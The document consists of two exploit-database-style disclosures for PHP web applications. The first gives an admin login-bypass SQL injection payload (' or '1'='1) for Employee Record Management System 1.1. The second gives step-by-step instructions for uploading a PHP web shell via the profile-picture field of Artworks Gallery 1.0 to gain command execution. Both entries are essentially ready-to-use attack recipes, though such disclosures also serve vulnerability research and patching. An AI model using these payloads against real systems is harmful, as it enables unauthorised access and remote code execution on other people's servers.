# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection # Date: 2020–11–17 # Exploit Author: Anurag Kumar Rawat(A1C3VENOM) # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ # Version: 1.1 # Tested on Parrot os(Linux) Attack Vector: An attacker can gain admin panel access using malicious sql injection quiries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/erms/admin/index.php 2. Now put below Payload in both the fields( User ID & Password) Payload: ' or '1'='1 3)Server accept this payload and attacker successfully bypassed admin panel without any credentials

# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile # Date: November 17th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: Source Code & Projects (https://code-projects.org) # Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf # Version: 1.0 # Tested On: Windows 10 (XAMPP Server) # CVE: CVE-2020-28687 -------------------- Proof of Concept: -------------------- 1. Authenticate as a user (or signup as an artist) 2. Go to edit profile 3. Upload a php-shell as profile picture and click update/save 4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution